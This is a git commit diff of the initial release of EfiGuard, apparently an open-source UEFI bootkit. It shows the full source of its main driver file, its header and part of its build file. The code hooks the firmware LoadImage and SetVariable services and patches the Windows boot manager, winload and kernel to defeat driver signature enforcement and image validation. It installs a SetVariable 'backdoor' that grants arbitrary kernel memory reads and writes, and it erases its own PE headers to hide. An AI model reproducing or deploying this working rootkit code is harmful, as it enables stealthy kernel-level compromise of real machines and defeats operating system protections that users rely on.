diff options
| author | Mattiwatti <mattiwatti@gmail.com> | 2019-03-25 20:56:43 +0100 |
|---|---|---|
| committer | Mattiwatti <mattiwatti@gmail.com> | 2019-03-25 20:56:43 +0100 |
| commit | 0be8f445b64ab36e086bd7e3a2913fdd147bd00f (patch) | |
| tree | 50e94db7d2f159f621f17096162c97a5e471cfa4 /EfiGuardDxe | |
Initial commitv1.0
Diffstat (limited to 'EfiGuardDxe')
| -rw-r--r-- | EfiGuardDxe/EfiGuardDxe.c | 639 | ||||
| -rw-r--r-- | EfiGuardDxe/EfiGuardDxe.h | 223 | ||||
| -rw-r--r-- | EfiGuardDxe/EfiGuardDxe.inf | 85 | ||||
| -rw-r--r-- | EfiGuardDxe/EfiGuardDxe.vcxproj | 96 | ||||
| -rw-r--r-- | EfiGuardDxe/EfiGuardDxe.vcxproj.filters | 200 | ||||
| -rw-r--r-- | EfiGuardDxe/PatchBootmgr.c | 372 | ||||
| -rw-r--r-- | EfiGuardDxe/PatchNtoskrnl.c | 661 | ||||
| -rw-r--r-- | EfiGuardDxe/PatchWinload.c | 683 | ||||
| -rw-r--r-- | EfiGuardDxe/VisualUefi.c | 108 | ||||
| m--------- | EfiGuardDxe/Zydis | 0 | ||||
| -rw-r--r-- | EfiGuardDxe/arc.h | 1317 | ||||
| -rw-r--r-- | EfiGuardDxe/ntdef.h | 80 | ||||
| -rw-r--r-- | EfiGuardDxe/pe.c | 502 | ||||
| -rw-r--r-- | EfiGuardDxe/pe.h | 252 | ||||
| -rw-r--r-- | EfiGuardDxe/util.c | 380 | ||||
| -rw-r--r-- | EfiGuardDxe/util.h | 120 |
16 files changed, 5718 insertions, 0 deletions
diff --git a/EfiGuardDxe/EfiGuardDxe.c b/EfiGuardDxe/EfiGuardDxe.c new file mode 100644 index 0000000..df2528f --- /dev/null +++ b/EfiGuardDxe/EfiGuardDxe.c @@ -0,0 +1,639 @@ +#include "EfiGuardDxe.h" + +#include <Protocol/Shell.h> +#include <Guid/EventGroup.h> +#include <Library/BaseMemoryLib.h> +#include <Library/DevicePathLib.h> +#include <Library/SynchronizationLib.h> + +// +// EFI Driver Version Protocol +// +EFI_DRIVER_SUPPORTED_EFI_VERSION_PROTOCOL gEfiGuardSupportedEfiVersion = +{ + sizeof(EFI_DRIVER_SUPPORTED_EFI_VERSION_PROTOCOL), + EFI_2_10_SYSTEM_TABLE_REVISION +}; + +// +// EfiGuard driver protocol +// +EFI_STATUS +EFIAPI +DriverConfigure( + IN EFIGUARD_CONFIGURATION_DATA* ConfigurationData + ); + +EFIGUARD_DRIVER_PROTOCOL gEfiGuardDriverProtocol = +{ + DriverConfigure +}; + +// +// Default driver configuration used if Configure() is not called +// +EFIGUARD_CONFIGURATION_DATA gDriverConfig = { + DSE_DISABLE_SETVARIABLE_HOOK, // DseBypassMethod + FALSE // WaitForKeyPress +}; + +// +// Bootmgfw.efi handle +// +EFI_HANDLE gBootmgfwHandle = NULL; + +// +// EFI runtime globals +// +EFI_EVENT gEfiExitBootServicesEvent = NULL; +BOOLEAN gEfiAtRuntime = FALSE; +EFI_EVENT gEfiVirtualNotifyEvent = NULL; +BOOLEAN gEfiGoneVirtual = FALSE; + +// +// Original gBS->LoadImage pointer +// +STATIC EFI_IMAGE_LOAD mOriginalLoadImage = NULL; + +// +// Original gRT->SetVariable pointer +// +STATIC EFI_SET_VARIABLE mOriginalSetVariable = NULL; + +#if defined(MDE_CPU_X64) +#define MM_SYSTEM_RANGE_START (VOID*)(0xFFFF080000000000) // Windows XP through 7 value. On newer systems this is a bit higher, but not that much +#elif defined(MDE_CPU_IA32) +#define MM_SYSTEM_RANGE_START (VOID*)(0x80000000) +#endif + +// Title (adapted from original by Dude719) +#define EFIGUARD_TITLE1 L"\r\n ██╗ ██╗ ██╗ ██╗ ██╗ " \ + L"\r\n ████╗ ████║ ██████╗████████╗████████╗╚═╝ " \ + L"\r\n ██║ ██╔═██║██╔════██╗ ██╔══╝ ██╔══╝██╗ " \ + L"\r\n ██║ ╚═╝ ██║██║ ██║ ██║ ██║ ██║ " +#define EFIGUARD_TITLE2 L"\r\n ██║ ██║ ╚███████║ █████╗ █████╗██║ " \ + L"\r\n ╚═╝ ╚═╝ ╚══════╝ ╚════╝ ╚════╝╚═╝ " \ + L"\r\n " \ + L"\r\n Rootkits You Can Trust (TM) \r\n" + + +// +// (Un)hooks a service table pointer, replacing its value with NewFunction and returning the original address. +// +VOID* +SetServicePointer( + IN OUT EFI_TABLE_HEADER *ServiceTableHeader, + IN OUT VOID **ServiceTableFunction, + IN VOID *NewFunction + ) +{ + if (ServiceTableFunction == NULL || NewFunction == NULL) + return NULL; + + // If this is really needed after boot time at some point the CRC function is easy enough to reimplement + ASSERT(gBS != NULL); + ASSERT(gBS->CalculateCrc32 != NULL); + + CONST EFI_TPL Tpl = gBS->RaiseTPL(TPL_HIGH_LEVEL); // Note: implies cli + + VOID* OriginalFunction = InterlockedCompareExchangePointer(ServiceTableFunction, + *ServiceTableFunction, + NewFunction); + + // Recalculate the table checksum + ServiceTableHeader->CRC32 = 0; + gBS->CalculateCrc32((UINT8*)ServiceTableHeader, ServiceTableHeader->HeaderSize, &ServiceTableHeader->CRC32); + + gBS->RestoreTPL(Tpl); + + return OriginalFunction; +} + +// +// Boot Services LoadImage hook +// +EFI_STATUS +EFIAPI +HookedLoadImage( + IN BOOLEAN BootPolicy, + IN EFI_HANDLE ParentImageHandle, + IN EFI_DEVICE_PATH_PROTOCOL *DevicePath, + IN VOID *SourceBuffer OPTIONAL, + IN UINTN SourceSize, + OUT EFI_HANDLE *ImageHandle + ) +{ + // Try to get a readable file path from the EFI shell protocol if it's available + EFI_SHELL_PROTOCOL* EfiShellProtocol = NULL; + CONST EFI_STATUS EfiShellStatus = gBS->LocateProtocol(&gEfiShellProtocolGuid, + NULL, + (VOID**)&EfiShellProtocol); + CHAR16* ImagePath = NULL; + if (!EFI_ERROR(EfiShellStatus)) + { + ImagePath = EfiShellProtocol->GetFilePathFromDevicePath(DevicePath); + } + if (ImagePath == NULL) + { + ImagePath = ConvertDevicePathToText(DevicePath, TRUE, TRUE); + } + + // We only have a filename to go on at this point. We will determine the final 'is this bootmgfw.efi?' status after the image has been loaded + CONST BOOLEAN MaybeBootmgfw = ImagePath != NULL + ? (StrStr(ImagePath, L"bootmgfw.efi") != NULL || StrStr(ImagePath, L"BOOTMGFW.EFI") != NULL || + StrStr(ImagePath, L"bootx64.efi") != NULL || StrStr(ImagePath, L"BOOTX64.EFI") != NULL) + : FALSE; + CONST BOOLEAN IsBoot = (MaybeBootmgfw || (BootPolicy == TRUE && SourceBuffer == NULL)); + + // Print what's being loaded or booted + CONST INT32 OriginalAttribute = SetConsoleTextColour(EFI_GREEN, FALSE); + Print(L"[HookedLoadImage] %S %S\r\n (ParentImageHandle = %llx)\r\n", + (IsBoot ? L"Booting" : L"Loading"), ImagePath, (UINTN)ParentImageHandle); + if (ImagePath != NULL) + FreePool(ImagePath); + RtlSleep(500); + + // Q: If we loaded bootmgfw.efi manually, is there any benefit to flipping BootPolicy to TRUE + // to make it look like the load request came straight from the boot manager? + if (MaybeBootmgfw) + { + // Let's find out + BootPolicy = TRUE; + } + + // Load the image + CONST EFI_STATUS Status = mOriginalLoadImage(BootPolicy, + ParentImageHandle, + DevicePath, + SourceBuffer, + SourceSize, + ImageHandle); + + // Was this a successful load of an image that's being booted? + if (!EFI_ERROR(Status) && IsBoot && *ImageHandle != NULL) + { + // Get loaded image info + EFI_LOADED_IMAGE_PROTOCOL *LoadedImage = NULL; + CONST EFI_STATUS ImageInfoStatus = gBS->OpenProtocol(*ImageHandle, + &gEfiLoadedImageProtocolGuid, + (VOID**)&LoadedImage, + gImageHandle, + NULL, + EFI_OPEN_PROTOCOL_GET_PROTOCOL); + if (EFI_ERROR(ImageInfoStatus)) + { + Print(L"\r\nHookedLoadImage: failed to get loaded image info. Status: %llx (%r)\r\n", + ImageInfoStatus, ImageInfoStatus); + } + else + { + // Determine the type of file we're loading + CONST INPUT_FILETYPE FileType = GetInputFileType((UINT8*)LoadedImage->ImageBase, LoadedImage->ImageSize); + ASSERT(FileType == Unknown || FileType == Bootmgr || FileType == BootmgfwEfi); + + if (FileType == BootmgfwEfi) + { + // This is bootmgfw.efi. Save the returned image handle + gBootmgfwHandle = *ImageHandle; + LoadedImage->ParentHandle = NULL; + + // Print image info + PrintLoadedImageInfo(LoadedImage); + + // Nuke it dot it + PatchBootManager(FileType, + LoadedImage->ImageBase, + LoadedImage->ImageSize); + } + } + } + + gST->ConOut->SetAttribute(gST->ConOut, OriginalAttribute); + gST->ConOut->EnableCursor(gST->ConOut, FALSE); + + return Status; +} + +// +// Runtime Services SetVariable hook +// +EFI_STATUS +EFIAPI +HookedSetVariable( + IN CHAR16 *VariableName, + IN EFI_GUID *VendorGuid, + IN UINT32 Attributes, + IN UINTN DataSize, + IN VOID *Data + ) +{ + // We should not be hooking the runtime table after ExitBootServices() unless this is the selected DSE bypass method + ASSERT(!gEfiAtRuntime || gDriverConfig.DseBypassMethod == DSE_DISABLE_SETVARIABLE_HOOK); + + // Do we have a match for the variable name and vendor GUID? + if (gEfiAtRuntime && gEfiGoneVirtual && + VariableName != NULL && VariableName[0] != CHAR_NULL && VendorGuid != NULL && + CompareGuid(VendorGuid, EFIGUARD_BACKDOOR_VARIABLE_GUID) && + StrnCmp(VariableName, EFIGUARD_BACKDOOR_VARIABLE_NAME, (sizeof(EFIGUARD_BACKDOOR_VARIABLE_NAME) / sizeof(CHAR16)) - 1) == 0) + { + // Yep. Do we have any data? + if (DataSize == 0 && Data == NULL) + { + // Nope. This is the first SetVariable() call from the HAL, intended to wipe the variable. + // (This call may be skipped if EFI_VARIABLE_APPEND_WRITE is set, but this is version-dependent) + return EFI_SUCCESS; + } + + if ((Attributes & EFIGUARD_BACKDOOR_VARIABLE_ATTRIBUTES) == EFIGUARD_BACKDOOR_VARIABLE_ATTRIBUTES && + DataSize == EFIGUARD_BACKDOOR_VARIABLE_DATASIZE && + Data != NULL) + { + // Yep, and Attributes and DataSize are correct. Check if *Data is a valid input for a backdoor read/write operation + EFIGUARD_BACKDOOR_DATA* BackdoorData = (EFIGUARD_BACKDOOR_DATA*)Data; + if (BackdoorData->CookieValue == EFIGUARD_BACKDOOR_COOKIE_VALUE && + BackdoorData->Size > 0 && + (UINTN)BackdoorData->KernelAddress >= (UINTN)MM_SYSTEM_RANGE_START) + { + if (BackdoorData->IsMemCopy && BackdoorData->u.UserBuffer != NULL) + { + if (BackdoorData->IsReadOperation) // Copy kernel buffer to user address + CopyMem(BackdoorData->u.UserBuffer, BackdoorData->KernelAddress, BackdoorData->Size); + else // Copy user buffer to kernel address + CopyMem(BackdoorData->KernelAddress, BackdoorData->u.UserBuffer, BackdoorData->Size); + } + else + { + // Copy user scalar to kernel memory, and put the old value in BackdoorData->u.XXX + switch (BackdoorData->Size) + { + case 1: + { + CONST UINT8 NewByte = (UINT8)BackdoorData->u.s.Byte; + BackdoorData->u.s.Byte = *(UINT8*)BackdoorData->KernelAddress; + if (!BackdoorData->IsReadOperation) + *(UINT8*)BackdoorData->KernelAddress = NewByte; + break; + } + case 2: + { + CONST UINT16 NewWord = (UINT16)BackdoorData->u.s.Word; + BackdoorData->u.s.Word = *(UINT16*)BackdoorData->KernelAddress; + if (!BackdoorData->IsReadOperation) + *(UINT16*)BackdoorData->KernelAddress = NewWord; + break; + } + case 4: + { + CONST UINT32 NewDword = (UINT32)BackdoorData->u.s.Dword; + BackdoorData->u.s.Dword = *(UINT32*)BackdoorData->KernelAddress; + if (!BackdoorData->IsReadOperation) + *(UINT32*)BackdoorData->KernelAddress = NewDword; + break; + } + case 8: + { + CONST UINT64 NewQword = (UINT64)BackdoorData->u.Qword; + BackdoorData->u.Qword = *(UINT64*)BackdoorData->KernelAddress; + if (!BackdoorData->IsReadOperation) + *(UINT64*)BackdoorData->KernelAddress = NewQword; + break; + } + default: + break; // Invalid size; do nothing + } + } + + // Backdoor complete + return EFI_SUCCESS; + } + //else { /*Invalid EFIGUARD_BACKDOOR_DATA* provided*/ } + } + //else { /*Data is NULL, or DataSize/Attributes mismatch*/ } + } + //else { /*Not our variable name + vendor GUID, or SetVirtualAddressMap() has not been called yet*/ } + + return mOriginalSetVariable(VariableName, VendorGuid, Attributes, DataSize, Data); +} + +// +// ExitBootServices callback +// +VOID +EFIAPI +ExitBootServicesEvent( + IN EFI_EVENT Event, + IN VOID* Context + ) +{ + // Close this event now. The boot loader only calls this once. + gBS->CloseEvent(gEfiExitBootServicesEvent); + gEfiExitBootServicesEvent = NULL; + + // The message buffer may be empty if the patch process was aborted in one of the earlier stages + if (gKernelPatchInfo.Buffer[0] != CHAR_NULL) + { + CONST EFI_STATUS Status = gKernelPatchInfo.Status; + CONST INT32 OriginalAttribute = gST->ConOut->Mode->Attribute; + if (Status == EFI_SUCCESS) + { + SetConsoleTextColour(EFI_GREEN, TRUE); + PrintKernelPatchInfo(); + Print(L"\r\nSuccessfully patched ntoskrnl.exe.\r\n"); + + if (gDriverConfig.WaitForKeyPress) + { + Print(L"\r\nPress any key to continue.\r\n"); + WaitForKey(); + } + } + else + { + // Patch failed. Most important stuff first: make a fake BSOD, because... reasons + // TODO if really bored: use GOP to set the BG colour on the whole screen. + // Could add one of those obnoxious Win 10 :( smileys and a QR code + gST->ConOut->SetAttribute(gST->ConOut, EFI_WHITE | EFI_BACKGROUND_BLUE); + gST->ConOut->ClearScreen(gST->ConOut); + + Print(L"A problem has been detected and Windows has been paused to prevent damage\r\nto your botnets.\r\n\r\n" + L"BOOTKIT_KERNEL_PATCH_FAILED\r\n\r\n" + L"Technical information:\r\n\r\n*** STOP: 0X%llX (%r, 0x%p)\r\n\r\n", + Status, Status, gKernelPatchInfo.KernelBase); + PrintKernelPatchInfo(); + + // Give time for user to register their loss and allow for the grieving process to set in + RtlSleep(2000); + + // Prompt user to ask what they want to do + Print(L"\r\nPress any key to continue anyway, or press ESC to reboot.\r\n"); + if (!WaitForKey()) + { + gRT->ResetSystem(EfiResetCold, EFI_SUCCESS, 0, NULL); + } + } + + gST->ConOut->SetAttribute(gST->ConOut, OriginalAttribute); + if (Status != EFI_SUCCESS) + gST->ConOut->ClearScreen(gST->ConOut); + } + + // If the DSE bypass method is *not* DSE_DISABLE_SETVARIABLE_HOOK, perform some cleanup now. In principle this should allow + // linking with /SUBSYSTEM:EFI_BOOT_SERVICE_DRIVER, because our driver image may be freed after this callback returns. + // Using DSE_DISABLE_SETVARIABLE_HOOK requires linking with /SUBSYSTEM:EFI_RUNTIME_DRIVER, because the image must not be freed. + if (gDriverConfig.DseBypassMethod != DSE_DISABLE_SETVARIABLE_HOOK) + { + // Uninstall our installed driver protocols + gBS->UninstallMultipleProtocolInterfaces(gImageHandle, + &gEfiGuardDriverProtocolGuid, + &gEfiGuardDriverProtocol, + &gEfiDriverSupportedEfiVersionProtocolGuid, + &gEfiGuardSupportedEfiVersion, + NULL); + + // Unregister SetVirtualAddressMap() notification + if (gEfiVirtualNotifyEvent != NULL) + { + gBS->CloseEvent(gEfiVirtualNotifyEvent); + gEfiVirtualNotifyEvent = NULL; + } + + // Unhook gRT->SetVariable + if (mOriginalSetVariable != NULL) + { + SetServicePointer(&gRT->Hdr, (VOID**)&gRT->SetVariable, (VOID*)mOriginalSetVariable); + mOriginalSetVariable = NULL; + } + } + + // Regardless of which OS is being booted, boot services won't be available after this callback returns + gBS = NULL; + mOriginalLoadImage = NULL; + gEfiAtRuntime = TRUE; +} + +// +// SetVirtualAddressMap callback +// +VOID +EFIAPI +SetVirtualAddressMapEvent( + IN EFI_EVENT Event, + IN VOID* Context + ) +{ + ASSERT(gEfiAtRuntime == TRUE); + ASSERT(gBS == NULL); + gEfiVirtualNotifyEvent = NULL; + + // Convert the original SetVariable pointer to virtual so our hook will continue to work + EFI_STATUS Status = gRT->ConvertPointer(0, (VOID**)&mOriginalSetVariable); + ASSERT_EFI_ERROR(Status); + + // Convert the runtime services pointer itself from physical to virtual + Status = gRT->ConvertPointer(0, (VOID**)&gRT); + ASSERT_EFI_ERROR(Status); + + // Set the flag indicating virtual addressing mode has been entered + gEfiGoneVirtual = TRUE; +} + +EFI_STATUS +EFIAPI +DriverConfigure( + IN EFIGUARD_CONFIGURATION_DATA* ConfigurationData + ) +{ + // Do not allow configure if we are at runtime, or if the Windows boot manager has been loaded + if (gEfiAtRuntime || gBootmgfwHandle != NULL) + return EFI_ACCESS_DENIED; + + if (ConfigurationData == NULL) + return EFI_INVALID_PARAMETER; + + gDriverConfig = *ConfigurationData; + + Print(L"Configuration data accepted.\r\n\r\n"); + + return EFI_SUCCESS; +} + +// +// Driver unload +// +EFI_STATUS +EFIAPI +EfiGuardUnload( + IN EFI_HANDLE ImageHandle + ) +{ + // Do not allow unload if we are at runtime, or if the Windows boot manager has been loaded + if (gEfiAtRuntime || gBootmgfwHandle != NULL) + { + return EFI_ACCESS_DENIED; + } + + ASSERT(gBS != NULL); + + // Uninstall our installed driver protocols + gBS->UninstallMultipleProtocolInterfaces(gImageHandle, + &gEfiGuardDriverProtocolGuid, + &gEfiGuardDriverProtocol, + &gEfiDriverSupportedEfiVersionProtocolGuid, + &gEfiGuardSupportedEfiVersion, + NULL); + + // Unregister SetVirtualAddressMap() notification + if (gEfiVirtualNotifyEvent != NULL) + { + gBS->CloseEvent(gEfiVirtualNotifyEvent); + gEfiVirtualNotifyEvent = NULL; + } + + // Unregister ExitBootServices() notification + if (gEfiExitBootServicesEvent != NULL) + { + gBS->CloseEvent(gEfiExitBootServicesEvent); + gEfiExitBootServicesEvent = NULL; + } + + // Unhook gRT->SetVariable + if (mOriginalSetVariable != NULL) + { + SetServicePointer(&gRT->Hdr, (VOID**)&gRT->SetVariable, (VOID*)mOriginalSetVariable); + mOriginalSetVariable = NULL; + } + + // Unhook gBS->LoadImage + if (mOriginalLoadImage != NULL) + { + SetServicePointer(&gBS->Hdr, (VOID**)&gBS->LoadImage, (VOID*)mOriginalLoadImage); + mOriginalLoadImage = NULL; + } + + return EFI_SUCCESS; +} + +// +// Main entry point +// +EFI_STATUS +EFIAPI +EfiGuardInitialize( + IN EFI_HANDLE ImageHandle, + IN EFI_SYSTEM_TABLE *SystemTable + ) +{ + ASSERT(ImageHandle == gImageHandle); + + // Check if we're not already loaded. + EFIGUARD_DRIVER_PROTOCOL* EfiGuardDriverProtocol; + EFI_STATUS Status = gBS->LocateProtocol(&gEfiGuardDriverProtocolGuid, + NULL, + (VOID**)&EfiGuardDriverProtocol); + if (Status != EFI_NOT_FOUND) + { + Print(L"An instance of the driver is already loaded.\r\n"); + return EFI_ALREADY_STARTED; + } + + // + // Install supported EFI version protocol + // + Status = gBS->InstallMultipleProtocolInterfaces(&gImageHandle, + &gEfiDriverSupportedEfiVersionProtocolGuid, + &gEfiGuardSupportedEfiVersion, + NULL); + if (EFI_ERROR(Status)) + { + Print(L"Failed to install EFI Driver Supported Version protocol. Error: %llx (%r)\r\n", Status, Status); + return Status; + } + + // + // Install EfiGuard driver protocol + // + Status = gBS->InstallProtocolInterface(&gImageHandle, + &gEfiGuardDriverProtocolGuid, + EFI_NATIVE_INTERFACE, + &gEfiGuardDriverProtocol); + if (EFI_ERROR(Status)) + goto Exit; + + // + // Clear screen and print header + // + CONST INT32 OriginalAttribute = SetConsoleTextColour(EFI_GREEN, TRUE); + Print(L"\r\n\r\n"); + Print(L"%S", EFIGUARD_TITLE1); + Print(L"%S", EFIGUARD_TITLE2); + gST->ConOut->SetAttribute(gST->ConOut, OriginalAttribute); + + EFI_LOADED_IMAGE_PROTOCOL *LocalImageInfo; + Status = gBS->OpenProtocol(gImageHandle, + &gEfiLoadedImageProtocolGuid, + (VOID**)&LocalImageInfo, + gImageHandle, + NULL, + EFI_OPEN_PROTOCOL_GET_PROTOCOL); + if (EFI_ERROR(Status)) + goto Exit; + + PrintLoadedImageInfo(LocalImageInfo); + + // + // Hook gBS->LoadImage + // + mOriginalLoadImage = (EFI_IMAGE_LOAD)SetServicePointer(&gBS->Hdr, (VOID**)&gBS->LoadImage, (VOID*)&HookedLoadImage); + Print(L"Hooked gBS->LoadImage: 0x%p -> 0x%p\r\n", (VOID*)mOriginalLoadImage, (VOID*)&HookedLoadImage); + + // + // Hook gRT->SetVariable + // + mOriginalSetVariable = (EFI_SET_VARIABLE)SetServicePointer(&gRT->Hdr, (VOID**)&gRT->SetVariable, (VOID**)&HookedSetVariable); + Print(L"Hooked gRT->SetVariable: 0x%p -> 0x%p\r\n", (VOID*)mOriginalSetVariable, (VOID*)&HookedSetVariable); + + // Register notification callback for ExitBootServices() + Status = gBS->CreateEventEx(EVT_NOTIFY_SIGNAL, + TPL_NOTIFY, + ExitBootServicesEvent, + NULL, + &gEfiEventExitBootServicesGuid, + &gEfiExitBootServicesEvent); + if (EFI_ERROR(Status)) + goto Exit; + + // Register notification callback for SetVirtualAddressMap() + Status = gBS->CreateEventEx(EVT_NOTIFY_SIGNAL, + TPL_NOTIFY, + SetVirtualAddressMapEvent, + NULL, + &gEfiEventVirtualAddressChangeGuid, + &gEfiVirtualNotifyEvent); + if (EFI_ERROR(Status)) + goto Exit; + + // Initialize the global kernel patch info struct. + gKernelPatchInfo.Status = EFI_SUCCESS; + gKernelPatchInfo.BufferSize = 0; + SetMem64(gKernelPatchInfo.Buffer, sizeof(gKernelPatchInfo.Buffer), 0ULL); + gKernelPatchInfo.LegacyLoaderBlock = FALSE; + gKernelPatchInfo.KernelBase = NULL; + + // Wipe our image info and PE headers + LocalImageInfo->DeviceHandle = LocalImageInfo->FilePath = LocalImageInfo->ParentHandle = NULL; + CONST PEFI_IMAGE_NT_HEADERS NtHeaders = RtlpImageNtHeaderEx(LocalImageInfo->ImageBase, LocalImageInfo->ImageSize); + ZeroMem(LocalImageInfo->ImageBase, NtHeaders->OptionalHeader.SizeOfHeaders); + + // The ASCII banner is very pretty - ensure the user has enough time to admire it + RtlSleep(1500); + +Exit: + if (EFI_ERROR(Status)) + { + Print(L"\r\nEfiGuardDxe initialization failed with status %llx (%r)\r\n", Status, Status); + + // Because we do not use the driver binding protocol, recovering from a failed load is simple. + // We can just call the unload function, which will only unload that which was actually installed. + EfiGuardUnload(gImageHandle); + } + return Status; +} diff --git a/EfiGuardDxe/EfiGuardDxe.h b/EfiGuardDxe/EfiGuardDxe.h new file mode 100644 index 0000000..e26dc5e --- /dev/null +++ b/EfiGuardDxe/EfiGuardDxe.h @@ -0,0 +1,223 @@ +#pragma once + +#include <Uefi.h> + +#include <Protocol/DriverSupportedEfiVersion.h> +#include <Protocol/EfiGuard.h> +#include <Library/UefiLib.h> +#include <Library/DebugLib.h> +#include <Library/MemoryAllocationLib.h> +#include <Library/UefiBootServicesTableLib.h> +#include <Library/UefiRuntimeServicesTableLib.h> + +#include <Zydis/Zydis.h> +#include "ntdef.h" +#include "pe.h" +#include "arc.h" +#include "util.h" + +#ifdef __cplusplus +extern "C" { +#endif + +// +// EfiGuard driver protocol handle +// +extern EFIGUARD_DRIVER_PROTOCOL gEfiGuardDriverProtocol; + +// +// Driver configuration data +// +extern EFIGUARD_CONFIGURATION_DATA gDriverConfig; + +// +// Bootmgfw.efi handle +// +extern EFI_HANDLE gBootmgfwHandle; + +// +// TRUE if ExitBootServices() has been called +// +extern BOOLEAN gEfiAtRuntime; + +// +// TRUE if SetVirtualAddressMap() has been called +// +extern BOOLEAN gEfiGoneVirtual; + +// +// Universal template bytes for a faux call inline hook (mov [e|r]ax, <addr>, push [e|r]ax, ret) +// +extern CONST UINT8 gHookTemplate[(sizeof(VOID*) / 4) + sizeof(VOID*) + 2]; + + +// +// [bootmgfw|bootmgr]!ImgArch[Efi]StartBootApplication hook to patch either winload.efi or bootmgr.efi +// This function was named ImgArchEfiStartBootApplication on versions <= 10.0.16299.0, later simply ImgArchStartBootApplication. +// +// Windows Vista/7 prototype +typedef +EFI_STATUS +(EFIAPI* +t_ImgArchStartBootApplication_Vista)( + IN PBL_APPLICATION_ENTRY AppEntry, + IN VOID* ImageBase, + IN UINT32 ImageSize, + OUT PBL_RETURN_ARGUMENTS ReturnArguments + ); + +// Windows 8+ prototype +typedef +EFI_STATUS +(EFIAPI* +t_ImgArchStartBootApplication_Eight)( + IN PBL_APPLICATION_ENTRY AppEntry, + IN VOID* ImageBase, + IN UINT32 ImageSize, + IN UINT32 BootOption, + OUT PBL_RETURN_ARGUMENTS ReturnArguments + ); + +extern VOID* /*t_ImgArchStartBootApplication_XX*/ gOriginalBootmgfwImgArchStartBootApplication; +extern UINT8 gBootmgfwImgArchStartBootApplicationBackup[sizeof(gHookTemplate)]; + +// This is only used if bootmgr.efi is invoked during the boot process +extern VOID* /*t_ImgArchStartBootApplication_XX*/ gOriginalBootmgrImgArchStartBootApplication; +extern UINT8 gBootmgrImgArchStartBootApplicationBackup[sizeof(gHookTemplate)]; + + +// +// Patches the Windows Boot Manager: either bootmgfw.efi or bootmgr.efi; normally the former unless booting a WIM file +// +EFI_STATUS +EFIAPI +PatchBootManager( + IN INPUT_FILETYPE FileType, + IN VOID* ImageBase, + IN UINTN ImageSize + ); + + +// +// winload!OslFwpKernelSetupPhase1 hook +// +typedef +EFI_STATUS +(EFIAPI* +t_OslFwpKernelSetupPhase1)( + IN PLOADER_PARAMETER_BLOCK LoaderBlock + ); + +extern t_OslFwpKernelSetupPhase1 gOriginalOslFwpKernelSetupPhase1; +extern UINT8 gOslFwpKernelSetupPhase1Backup[sizeof(gHookTemplate)]; + +EFI_STATUS +EFIAPI +HookedOslFwpKernelSetupPhase1( + IN PLOADER_PARAMETER_BLOCK LoaderBlock + ); + + +// +// Patches winload.efi +// +EFI_STATUS +EFIAPI +PatchWinload( + IN VOID* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders + ); + +// +// Patches ImgpValidateImageHash in bootmgfw.efi, bootmgr.efi, and winload.[efi|exe] +// This patch is completely optional, unless you want to boot a custom kernel or winload image. +// It is applied if possible, but failures are ignored. +// +EFI_STATUS +EFIAPI +PatchImgpValidateImageHash( + IN INPUT_FILETYPE FileType, + IN UINT8* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders + ); + +// +// Patches ImgpFilterValidationFailure in bootmgfw.efi, bootmgr.efi, and winload.[efi|exe] +// This patch is completely optional, unless you want to boot a custom kernel or winload image. +// It is applied if possible, but failures are ignored. +// +EFI_STATUS +EFIAPI +PatchImgpFilterValidationFailure( + IN INPUT_FILETYPE FileType, + IN UINT8* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders + ); + +// +// winload!BlStatusPrint. This is not hooked, but used to print debug output to kd or WinDbg +// from the OslFwpKernelSetupPhase1 hook (in which gST->ConOut is no longer available) +// +typedef +NTSTATUS +(EFIAPI* +t_BlStatusPrint)( + IN CONST CHAR16 *Format, + ... + ); + +extern t_BlStatusPrint gBlStatusPrint; + +NTSTATUS +EFIAPI +BlStatusPrintNoop( + IN CONST CHAR16 *Format, + ... + ); + + +// +// Patches ntoskrnl.exe +// +EFI_STATUS +EFIAPI +PatchNtoskrnl( + IN VOID* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders + ); + + +// +// The kernel patch result. This is used to hold data generated during +// HookedOslFwpKernelSetupPhase1 and PatchNtoskrnl until we can safely access +// boot services to print the output. This is done during the ExitBootServices() callback. +// +// Status holds the final patch status. If this is not EFI_SUCCESS, the buffer holds an +// error message, and the user will be prompted to reboot or continue. +// If Status is EFI_SUCCESS, the buffer holds concatenated patch information similar to what +// is printed during the patching of bootmgfw.efi/bootmgr.efi/winload.efi. +// +typedef struct _KERNEL_PATCH_INFORMATION +{ + EFI_STATUS Status; + UINTN BufferSize; // In bytes, excluding null terminator. This may be 0. The maximum buffer size is simply sizeof(Buffer). + CHAR16 Buffer[8192]; // 8K ought to be enough for everyone + BOOLEAN LegacyLoaderBlock; // TRUE if the loader block provided by winload.efi will be for Vista or older kernels + VOID* KernelBase; +} KERNEL_PATCH_INFORMATION; + +extern KERNEL_PATCH_INFORMATION gKernelPatchInfo; + + +// +// Appends a kernel patch status info or error message to the buffer for delayed printing, +// and prints it to a boot debugger immediately if one is connected. +// +#define PRINT_KERNEL_PATCH_MSG(Fmt, ...) { \ + gBlStatusPrint(Fmt, ##__VA_ARGS__); \ + AppendKernelPatchMessage(Fmt, ##__VA_ARGS__); \ + } + +#ifdef __cplusplus +} +#endif diff --git a/EfiGuardDxe/EfiGuardDxe.inf b/EfiGuardDxe/EfiGuardDxe.inf new file mode 100644 index 0000000..ca63724 --- /dev/null +++ b/EfiGuardDxe/EfiGuardDxe.inf @@ -0,0 +1,85 @@ +[Defines] + INF_VERSION = 0x00010019 + BASE_NAME = EfiGuardDxe + FILE_GUID = 503682AC-F01E-4D10-AAE3-BE5A90A563E7 + MODULE_TYPE = DXE_RUNTIME_DRIVER + VERSION_STRING = 1.0 + + ENTRY_POINT = EfiGuardInitialize + UNLOAD_IMAGE = EfiGuardUnload + +[Sources] + EfiGuardDxe.c + PatchBootmgr.c + PatchNtoskrnl.c + PatchWinload.c + pe.c + util.c + Zydis/src/Decoder.c + Zydis/src/DecoderData.c + Zydis/src/MetaInfo.c + Zydis/src/Mnemonic.c + Zydis/src/Register.c + Zydis/src/SharedData.c + Zydis/src/String.c + Zydis/src/Utils.c + Zydis/src/Zydis.c + +[Packages] + MdePkg/MdePkg.dec + EfiGuardPkg/EfiGuardPkg.dec + MdeModulePkg/MdeModulePkg.dec + # In EDK2 releases older than UDK2017, gEfiShellProtocolGuid is not in MdePkg but in ShellPkg. + # ShellPkg/ShellPkg.dec + +[LibraryClasses] + UefiDriverEntryPoint + UefiBootServicesTableLib + UefiRuntimeServicesTableLib + DebugLib + UefiLib 